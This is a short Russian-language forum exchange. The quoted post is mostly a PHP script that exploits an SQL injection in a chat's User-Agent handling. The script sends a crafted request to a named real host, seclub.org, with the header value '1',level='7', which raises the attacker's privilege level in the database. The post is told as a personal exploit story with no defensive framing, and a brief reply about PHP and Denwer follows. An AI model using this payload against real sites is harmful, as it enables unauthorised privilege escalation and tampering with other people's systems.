quote:

А с чего же все началось? Как-то раз, сидя в аське, я узнал у хорошего знакомого про то, что этот чат записывает в базу данных переменную с юзерагентом ($HTTP_USER_AGENT) без каких-либо проверок. Переварив эту инфу и зная о том, что поле с правами пользователя в БД называется «level», я решил проверить чат на sql-injection. Я накатал простенький php-скрипт, увеличивающий «level» на несколько пунктов, $fp = fsockopen("seclub.org", 80, $errno, $errstr, 30);

$out = "GET /chat/chat.php?id=41711&ps=testaz&rm=4&ref=169569 HTTP/1.1\r\n";

$out .= "Host: seclub.org\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: 1',level='7\r\n\r\n";

fwrite($fp, $out);

fclose($fp);

?>

quote:

ORIGINAL: zzsnn

А ты знаешь что такое php, и что такое денвер?